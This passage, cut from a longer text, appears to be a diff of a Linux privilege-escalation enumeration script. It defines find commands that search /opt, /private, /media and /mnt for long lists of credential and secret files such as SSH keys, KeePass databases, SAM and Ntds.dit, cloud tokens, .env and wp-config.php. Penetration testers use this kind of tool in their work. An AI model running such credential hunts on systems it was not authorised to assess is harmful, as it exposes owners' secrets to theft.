-name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_OPT=`eval_bckgrd "find /opt -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` - FIND_PRIVATE=`eval_bckgrd "find /private -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"agent*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"sess_*\" -o -name \"000-default.conf\" -o -name \"ffftp.ini\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MEDIA=`eval_bckgrd "find /media -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_MNT=`eval_bckgrd "find /mnt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"sess_*\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` + FIND_OPT=`eval_bckgrd "find /opt -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name 